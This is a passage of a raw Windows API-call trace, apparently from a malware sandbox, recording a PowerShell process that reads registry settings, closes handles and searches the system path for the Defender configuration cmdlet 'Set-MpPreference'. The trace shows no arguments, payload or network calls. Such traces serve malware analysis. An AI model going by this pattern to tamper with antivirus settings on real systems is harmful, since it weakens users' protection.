RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e984 | out: phkResult=0x12e984*=0x3ec) returned 0x0 [0161.178] RegQueryValueExW (in: hKey=0x3ec, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12e9cc, lpData=0x0, lpcbData=0x12e9c8*=0x0 | out: lpType=0x12e9cc*=0x0, lpData=0x0, lpcbData=0x12e9c8*=0x0) returned 0x2 [0161.253] SetEvent (hEvent=0x3c8) returned 1 [0161.253] GetLastError () returned 0x0 [0161.253] SetEvent (hEvent=0x3cc) returned 1 [0161.253] GetLastError () returned 0x0 [0161.253] SetEvent (hEvent=0x3d0) returned 1 [0161.253] GetLastError () returned 0x0 [0161.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0161.312] GetLastError () returned 0xcb [0161.320] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12ea60 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12ea60) returned 0x1 [0161.320] GetLastError () returned 0xcb [0161.320] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12ea68 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12ea68) returned 1 [0161.322] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dffee0*="Stopped", lpRawData=0x2dffd9c) returned 1 [0161.327] GetLastError () returned 0x0 [0161.328] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0161.328] GetLastError () returned 0x0 [0161.329] CoGetContextToken (in: pToken=0x12f798 | out: pToken=0x12f798) returned 0x0 [0161.329] CObjectContext::QueryInterface () returned 0x0 [0161.330] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.330] Release () returned 0x0 [0161.331] CoGetContextToken (in: pToken=0x12f570 | out: pToken=0x12f570) returned 0x0 [0161.331] CObjectContext::QueryInterface () returned 0x0 [0161.331] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.331] Release () returned 0x0 [0161.334] CoGetContextToken (in: pToken=0x12f570 | out: pToken=0x12f570) returned 0x0 [0161.334] CObjectContext::QueryInterface () returned 0x0 [0161.334] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.334] Release () returned 0x0 [0161.338] CoGetContextToken (in: pToken=0x12f570 | out: pToken=0x12f570) returned 0x0 [0161.338] CObjectContext::QueryInterface () returned 0x0 [0161.339] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.339] Release () returned 0x0 [0161.389] CoGetContextToken (in: pToken=0x12f550 | out: pToken=0x12f550) returned 0x0 [0161.389] CObjectContext::QueryInterface () returned 0x0 [0161.389] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.389] Release () returned 0x0 [0161.390] CoUninitialize () Thread: id = 115 os_tid = 0x798 Thread: id = 116 os_tid = 0x67c Thread: id = 121 os_tid = 0x84c Thread: id = 127 os_tid = 0x848 Thread: id = 128 os_tid = 0x8d4 [0129.730] CoGetContextToken (in: pToken=0x4b6f678 | out: pToken=0x4b6f678) returned 0x0 [0129.730] CObjectContext::QueryInterface () returned 0x0 [0129.730] CObjectContext::GetCurrentThreadType () returned 0x0 [0129.730] Release () returned 0x0 [0129.730] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0150.632] LocalFree (hMem=0x5098d8) returned 0x0 [0150.633] GetLastError () returned 0x0 [0150.633] CloseHandle (hObject=0x34c) returned 1 [0150.633] GetLastError () returned 0x0 [0150.633] CloseHandle (hObject=0x13) returned 1 [0150.633] GetLastError () returned 0x0 [0150.633] CloseHandle (hObject=0xf) returned 1 [0150.634] GetLastError () returned 0x0 [0150.634] RegCloseKey (hKey=0x330) returned 0x0 [0150.634] RegCloseKey (hKey=0x32c) returned 0x0 [0150.634] RegCloseKey (hKey=0x328) returned 0x0 [0150.634] LocalFree (hMem=0x5098f8) returned 0x0 [0150.634] GetLastError () returned 0x0 [0150.634] RegCloseKey (hKey=0x350) returned 0x0 [0151.976] RegCloseKey (hKey=0x350) returned 0x0 [0153.986] RegCloseKey (hKey=0x394) returned 0x0 [0153.987] RegCloseKey (hKey=0x390) returned 0x0 [0153.987] RegCloseKey (hKey=0x32c) returned 0x0 [0153.987] RegCloseKey (hKey=0x3bc) returned 0x0 [0153.987] RegCloseKey (hKey=0x388) returned 0x0 [0153.988] RegCloseKey (hKey=0x384) returned 0x0 [0153.988] RegCloseKey (hKey=0x380) returned 0x0 [0153.988] RegCloseKey (hKey=0x37c) returned 0x0 [0153.988] RegCloseKey (hKey=0x378) returned 0x0 [0153.989] RegCloseKey (hKey=0x374) returned 0x0 [0153.989] RegCloseKey (hKey=0x370) returned 0x0 [0153.989] RegCloseKey (hKey=0x3b8) returned 0x0 [0153.989] RegCloseKey (hKey=0x3b4) returned 0x0 [0153.989] RegCloseKey (hKey=0x368) returned 0x0 [0153.990] RegCloseKey (hKey=0x364) returned 0x0 [0153.990] RegCloseKey (hKey=0x360) returned 0x0 [0153.990] RegCloseKey (hKey=0x35c) returned 0x0 [0153.990] RegCloseKey (hKey=0x358) returned 0x0 [0153.991] RegCloseKey (hKey=0x34c) returned 0x0 [0153.991] RegCloseKey (hKey=0x330) returned 0x0 [0153.991] RegCloseKey (hKey=0x328) returned 0x0 [0153.991] RegCloseKey (hKey=0x350) returned 0x0 [0153.991] RegCloseKey (hKey=0x3b0) returned 0x0 [0153.992] RegCloseKey (hKey=0x3ac) returned 0x0 [0153.992] RegCloseKey (hKey=0x38c) returned 0x0 [0153.992] RegCloseKey (hKey=0x3c0) returned 0x0 [0153.992] RegCloseKey (hKey=0x3a4) returned 0x0 [0153.993] RegCloseKey (hKey=0x3a0) returned 0x0 [0153.993] RegCloseKey (hKey=0x39c) returned 0x0 [0153.993] RegCloseKey (hKey=0x398) returned 0x0 [0156.815] RegCloseKey (hKey=0x3b4) returned 0x0 [0161.333] GetLastError () returned 0x0 [0161.333] GetLastError () returned 0x0 [0161.333] LocalFree (hMem=0x5007f0) returned 0x0 [0161.333] GetLastError () returned 0x0 [0161.333] GetLastError () returned 0x0 [0161.333] GetLastError () returned 0x0 [0161.333] LocalFree (hMem=0x500768) returned 0x0 [0161.333] GetLastError () returned 0x0 [0161.338] DeregisterEventSource (hEventLog=0x4f20004) returned 1 [0161.353] GetLastError () returned 0x0 [0161.366] CloseHandle (hObject=0x3e0) returned 1 [0161.366] GetLastError () returned 0x0 [0161.366] CloseHandle (hObject=0x3dc) returned 1 [0161.366] GetLastError () returned 0x0 [0161.367] CloseHandle (hObject=0x3d8) returned 1 [0161.367] GetLastError () returned 0x0 [0161.367] CloseHandle (hObject=0x3d4) returned 1 [0161.367] GetLastError () returned 0x0 [0161.367] CloseHandle (hObject=0x3d0) returned 1 [0161.367] GetLastError () returned 0x0 [0161.367] CloseHandle (hObject=0x3cc) returned 1 [0161.367] GetLastError () returned 0x0 [0161.368] CloseHandle (hObject=0x3c8) returned 1 [0161.368] GetLastError () returned 0x0 [0161.368] CloseHandle (hObject=0x3a8) returned 1 [0161.368] GetLastError () returned 0x0 [0161.368] CloseHandle (hObject=0x394) returned 1 [0161.368] GetLastError () returned 0x0 [0161.368] CloseHandle (hObject=0x390) returned 1 [0161.368] GetLastError () returned 0x0 [0161.368] CloseHandle (hObject=0x32c) returned 1 [0161.368] GetLastError () returned 0x0 [0161.369] CloseHandle (hObject=0xf) returned 1 [0161.369] GetLastError () returned 0x0 [0161.369] CloseHandle (hObject=0x7f) returned 1 [0161.370] GetLastError () returned 0x0 [0161.370] CloseHandle (hObject=0x7b) returned 1 [0161.370] GetLastError () returned 0x0 [0161.370] CloseHandle (hObject=0x77) returned 1 [0161.371] GetLastError () returned 0x0 [0161.371] CloseHandle (hObject=0x73) returned 1 [0161.371] GetLastError () returned 0x0 [0161.372] CloseHandle (hObject=0x6f) returned 1 [0161.372] GetLastError () returned 0x0 [0161.372] CloseHandle (hObject=0x6b) returned 1 [0161.372] GetLastError () returned 0x0 [0161.373] CloseHandle (hObject=0x67) returned 1 [0161.373] GetLastError () returned 0x0 [0161.373] CloseHandle (hObject=0x63) returned 1 [0161.373] GetLastError () returned 0x0 [0161.373] CloseHandle (hObject=0x5f) returned 1 [0161.374] GetLastError () returned 0x0 [0161.374] CloseHandle (hObject=0x5b) returned 1 [0161.374] GetLastError () returned 0x0 [0161.374] CloseHandle (hObject=0x57) returned 1 [0161.374] GetLastError () returned 0x0 [0161.375] CloseHandle (hObject=0x53) returned 1 [0161.375] GetLastError () returned 0x0 [0161.375] CloseHandle (hObject=0x4f) returned 1 [0161.375] GetLastError () returned 0x0 [0161.376] CloseHandle (hObject=0x4b) returned 1 [0161.376] GetLastError () returned 0x0 [0161.376] CloseHandle (hObject=0x47) returned 1 [0161.376] GetLastError () returned 0x0 [0161.376] CloseHandle (hObject=0x368) returned 1 [0161.376] GetLastError () returned 0x0 [0161.377] CloseHandle (hObject=0x364) returned 1 [0161.377] GetLastError () returned 0x0 [0161.377] CloseHandle (hObject=0x360) returned 1 [0161.377] GetLastError () returned 0x0 [0161.377] CloseHandle (hObject=0x35c) returned 1 [0161.377] GetLastError () returned 0x0 [0161.377] CloseHandle (hObject=0x358) returned 1 [0161.377] GetLastError () returned 0x0 [0161.378] CloseHandle (hObject=0x34c) returned 1 [0161.378] GetLastError () returned 0x0 [0161.378] CloseHandle (hObject=0x330) returned 1 [0161.378] GetLastError () returned 0x0 [0161.378] CloseHandle (hObject=0x328) returned 1 [0161.378] GetLastError () returned 0x0 [0161.378] CloseHandle (hObject=0x350) returned 1 [0161.378] GetLastError () returned 0x0 [0161.378] CloseHandle (hObject=0x3b0) returned 1 [0161.378] GetLastError () returned 0x0 [0161.379] CloseHandle (hObject=0x3ac) returned 1 [0161.379] GetLastError () returned 0x0 [0161.379] CloseHandle (hObject=0x1f4) returned 1 [0161.379] GetLastError () returned 0x0 [0161.379] CloseHandle (hObject=0x1f0) returned 1 [0161.379] GetLastError () returned 0x0 [0161.379] CloseHandle (hObject=0x43) returned 1 [0161.380] GetLastError () returned 0x0 [0161.380] CloseHandle (hObject=0x3f) returned 1 [0161.380] GetLastError () returned 0x0 [0161.380] CloseHandle (hObject=0x3b) returned 1 [0161.380] GetLastError () returned 0x0 [0161.381] CloseHandle (hObject=0x37) returned 1 [0161.381] GetLastError () returned 0x0 [0161.381] CloseHandle (hObject=0x33) returned 1 [0161.381] GetLastError () returned 0x0 [0161.381] CloseHandle (hObject=0x2f) returned 1 [0161.382] GetLastError () returned 0x0 [0161.382] CloseHandle (hObject=0x2b) returned 1 [0161.382] GetLastError () returned 0x0 [0161.382] CloseHandle (hObject=0x27) returned 1 [0161.383] GetLastError () returned 0x0 [0161.383] CloseHandle (hObject=0x23) returned 1 [0161.383] GetLastError () returned 0x0 [0161.383] CloseHandle (hObject=0x1f) returned 1 [0161.384] GetLastError () returned 0x0 [0161.384] CloseHandle (hObject=0x1b) returned 1 [0161.384] GetLastError () returned 0x0 [0161.384] CloseHandle (hObject=0x17) returned 1 [0161.385] GetLastError () returned 0x0 [0161.385] CloseHandle (hObject=0x13) returned 1 [0161.385] GetLastError () returned 0x0 [0161.385] CloseHandle (hObject=0x354) returned 1 [0161.385] GetLastError () returned 0x0 [0161.386] RegCloseKey (hKey=0x3ec) returned 0x0 [0161.386] RegCloseKey (hKey=0x80000004) returned 0x0 [0161.386] CloseHandle (hObject=0x3e8) returned 1 [0161.386] GetLastError () returned 0x0 [0161.386] CloseHandle (hObject=0x310) returned 1 [0161.386] GetLastError () returned 0x0 [0161.386] CloseHandle (hObject=0x344) returned 1 [0161.386] GetLastError () returned 0x0 [0161.387] UnmapViewOfFile (lpBaseAddress=0x1f80000) returned 1 [0161.387] CloseHandle (hObject=0x3e4) returned 1 [0161.387] GetLastError () returned 0x0 Thread: id = 198 os_tid = 0x828 Thread: id = 199 os_tid = 0x534 [0155.949] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0156.049] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.069] VirtualQuery (in: lpAddress=0x601e530, lpBuffer=0x601f530, dwLength=0x1c | out: lpBuffer=0x601f530*(BaseAddress=0x601e000, AllocationBase=0x5690000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.114] GetLastError () returned 0xcb [0156.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.119] GetLastError () returned 0xcb [0156.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.121] GetLastError () returned 0xcb [0156.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.184] GetLastError () returned 0xcb [0156.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.189] GetLastError () returned 0xcb [0156.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.190] GetLastError () returned 0xcb [0156.247] VirtualQuery (in: lpAddress=0x601e64c, lpBuffer=0x601f64c, dwLength=0x1c | out: lpBuffer=0x601f64c*(BaseAddress=0x601e000, AllocationBase=0x5690000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.248] GetLastError () returned 0xcb [0156.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.251] GetLastError () returned 0xcb [0156.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.251] GetLastError () returned 0xcb [0156.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.277] GetLastError () returned 0xcb [0156.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.347] GetLastError () returned 0xcb [0156.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.469] GetLastError () returned 0xcb [0156.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.471] GetLastError () returned 0xcb [0156.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.472] GetLastError () returned 0xcb [0156.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.474] GetLastError () returned 0xcb [0156.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.475] GetLastError () returned 0xcb [0156.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.476] GetLastError () returned 0xcb [0156.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.478] GetLastError () returned 0xcb [0156.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.534] GetLastError () returned 0xcb [0156.630] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.630] GetLastError () returned 0xcb [0156.644] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x92 [0156.644] GetLastError () returned 0xcb [0156.644] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x55fc18, nSize=0x92 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0156.644] GetLastError () returned 0xcb [0156.669] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x55fe10 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.669] GetLastError () returned 0xcb [0156.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.717] GetLastError () returned 0xcb [0156.718] SetErrorMode (uMode=0x1) returned 0x1 [0156.720] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.ps1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.721] GetLastError () returned 0x2 [0156.721] SetErrorMode (uMode=0x1) returned 0x1 [0156.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.723] GetLastError () returned 0x2 [0156.723] SetErrorMode (uMode=0x1) returned 0x1 [0156.724] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psm1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.724] GetLastError () returned 0x2 [0156.724] SetErrorMode (uMode=0x1) returned 0x1 [0156.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.724] GetLastError () returned 0x2 [0156.724] SetErrorMode (uMode=0x1) returned 0x1 [0156.724] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psd1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.724] GetLastError () returned 0x2 [0156.724] SetErrorMode (uMode=0x1) returned 0x1 [0156.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.725] GetLastError () returned 0x2 [0156.725] SetErrorMode (uMode=0x1) returned 0x1 [0156.725] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.COM", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.725] GetLastError () returned 0x2 [0156.725] SetErrorMode (uMode=0x1) returned 0x1 [0156.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.725] GetLastError () returned 0x2 [0156.725] SetErrorMode (uMode=0x1) returned 0x1 [0156.725] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.EXE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.725] GetLastError () returned 0x2 [0156.725] SetErrorMode (uMode=0x1) returned 0x1 [0156.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.726] GetLastError () returned 0x2 [0156.815] SetErrorMode (uMode=0x1) returned 0x1 [0156.816] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.BAT", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.816] GetLastError () returned 0x2 [0156.816] SetErrorMode (uMode=0x1) returned 0x1 [0156.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.816] GetLastError () returned 0x2 [0156.816] SetErrorMode (uMode=0x1) returned 0x1 [0156.816] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.CMD", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.817] GetLastError () returned 0x2 [0156.817] SetErrorMode (uMode=0x1) returned 0x1 [0156.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.817] GetLastError () returned 0x2 [0156.817] SetErrorMode (uMode=0x1) returned 0x1 [0156.817] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.817] GetLastError () returned 0x2 [0156.817] SetErrorMode (uMode=0x1) returned 0x1 [0156.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.817] GetLastError () returned 0x2 [0156.817] SetErrorMode (uMode=0x1) returned 0x1 [0156.817] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.818] GetLastError () returned 0x2 [0156.818] SetErrorMode (uMode=0x1) returned 0x1 [0156.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.818] GetLastError () returned 0x2 [0156.818] SetErrorMode (uMode=0x1) returned 0x1 [0156.818] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.818] GetLastError () returned 0x2 [0156.818] SetErrorMode (uMode=0x1) returned 0x1 [0156.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.818] GetLastError () returned 0x2 [0156.818] SetErrorMode (uMode=0x1) returned 0x1 [0156.818] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JSE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.818] GetLastError () returned 0x2 [0156.819] SetErrorMode (uMode=0x1) returned 0x1 [0156.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.819] GetLastError () returned 0x2 [0156.819] SetErrorMode (uMode=0x1) returned 0x1 [0156.819] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSF", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.819] GetLastError () returned 0x2 [0156.819] SetErrorMode (uMode=0x1) returned 0x1 [0156.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.819] GetLastError () returned 0x2 [0156.819] SetErrorMode (uMode=0x1) returned 0x1 [0156.819] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSH", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.819] GetLastError () returned 0x2 [0156.819] SetErrorMode (uMode=0x1) returned 0x1 [0156.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.820] GetLastError () returned 0x2 [0156.820] SetErrorMode (uMode=0x1) returned 0x1 [0156.820] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.MSC", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.820] GetLastError () returned 0x2 [0156.820] SetErrorMode (uMode=0x1) returned 0x1 [0156.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.820] GetLastError () returned 0x2 [0156.820] SetErrorMode (uMode=0x1) returned 0x1 [0156.820] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.820] GetLastError () returned 0x2 [0156.820] SetErrorMode (uMode=0x1) returned 0x1 [0156.825] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.825] GetLastError () returned 0x2 [0156.825] SetErrorMode (uMode=0x1) returned 0x1 [0156.826] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.ps1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.826] GetLastError () returned 0x2 [0156.826] SetErrorMode (uMode=0x1) returned 0x1 [0156.826] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.826] GetLastError () returned 0x2 [0156.826] SetErrorMode (uMode=0x1) returned 0x1 [0156.826] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psm1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.826] GetLastError () returned 0x2 [0156.826] SetErrorMode (uMode=0x1) returned 0x1 [0156.827] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.827] GetLastError () returned 0x2 [0156.827] SetErrorMode (uMode=0x1) returned 0x1 [0156.827] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psd1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.827] GetLastError () returned 0x2 [0156.827] SetErrorMode (uMode=0x1) returned 0x1 [0156.827] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.827] GetLastError () returned 0x2 [0156.827] SetErrorMode (uMode=0x1) returned 0x1 [0156.827] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.COM", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.827] GetLastError () returned 0x2 [0156.827] SetErrorMode (uMode=0x1) returned 0x1 [0156.828] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.828] GetLastError () returned 0x2 [0156.828] SetErrorMode (uMode=0x1) returned 0x1 [0156.828] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.EXE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.828] GetLastError () returned 0x2 [0156.828] SetErrorMode (uMode=0x1) returned 0x1 [0156.828] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.828] GetLastError () returned 0x2 [0156.828] SetErrorMode (uMode=0x1) returned 0x1 [0156.828] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.BAT", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.828] GetLastError () returned 0x2 [0156.828] SetErrorMode (uMode=0x1) returned 0x1 [0156.828] GetFullPathNameW (in: lpFileName="C:\\Windows", 